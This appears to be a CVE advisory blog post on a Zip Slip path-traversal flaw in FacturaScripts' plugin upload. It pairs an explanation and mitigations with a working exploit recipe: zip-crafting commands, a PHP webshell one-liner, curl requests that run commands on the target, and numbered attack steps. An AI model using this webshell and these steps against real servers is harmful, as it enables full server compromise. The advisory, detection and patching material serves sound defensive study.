FacturaScripts, Zip Slip Vulnerability, CVE-2026-27891 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The flaw resides in FacturaScripts’ Plugins::add() function within Plugins.php. The testZipFile function checks that the ZIP archive contains exactly one root folder by counting unique first path segments. However, it does not sanitize individual file paths for directory traversal sequences. An attacker creates a malicious ZIP where a file entry is named “ValidPluginName/../../shell.php”. The explode() function splits on ‘/’ and sees “ValidPluginName” as the first element, satisfying the single-root-folder validation. During extraction, the system concatenates the destination plugins directory with the full entry name, including “../..”. This path traversal writes shell.php outside the plugins folder, e.g., into the web root. Because the extracted file is a .php script, an attacker can then request it via HTTP and achieve Remote Code Execution (RCE) with web server privileges. The vulnerability requires no authentication if the plugin upload feature is exposed to unprivileged users. The impacted function fails to call realpath() or validate the final absolute path before writing. Attackers can overwrite critical system files like config.php or index.php. The provided PoC uses evilarc to generate the ZIP, injects a system() payload, uploads via “Add Plugin”, and triggers the shell via URL. This leads to full server compromise.

dailycve form:

Platform: FacturaScripts
Version: All versions
Vulnerability: Zip Slip RCE
Severity: Critical
date: 07 May 2026

Prediction: Mid June 2026

What Undercode Say:

Create malicious ZIP using evilarc
python evilarc.py -o unix -p "MyPlugin/../../" -f evil.zip shell.php
Manual ZIP creation (Linux)
mkdir -p MyPlugin/../../
echo '<?php system($_GET["cmd"]); ?>' > MyPlugin/../../rce.php
zip -r evil.zip MyPlugin/
Verify traversal
unzip -l evil.zip
Exploit trigger
curl "https://target.com/rce.php?cmd=id"
Detection command (search for suspicious files)
find /var/www/html -name ".php" -newer /var/www/html/plugins -type f

Exploit:

  1. Craft ZIP with entry: “PluginName/../../rce.php” containing PHP webshell.
  2. Navigate to FacturaScripts admin panel → Add Plugin.
  3. Upload malicious ZIP (validation passes due to single root folder name).
  4. System extracts file to web root due to path traversal.
  5. Access https://target.com/rce.php?cmd=whoami to execute commands.

Protection from this CVE:

  • Update to patched version once available (monitor FacturaScripts GitHub).
  • Apply input validation: reject any ZIP entry containing “..” or absolute paths.
  • Use `realpath()` after resolving destination and ensure it stays inside plugins directory.
  • Run web server with least privilege (www-data cannot write to sensitive dirs).
  • Disable plugin upload functionality if not required.
  • Use a Web Application Firewall (WAF) to block path traversal strings in uploaded filenames.

Impact:

  • Full server compromise: read database credentials, modify source code, delete files.
  • Remote Code Execution leads to complete loss of confidentiality, integrity, and availability.
  • Attacker can pivot to internal network or deploy ransomware.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top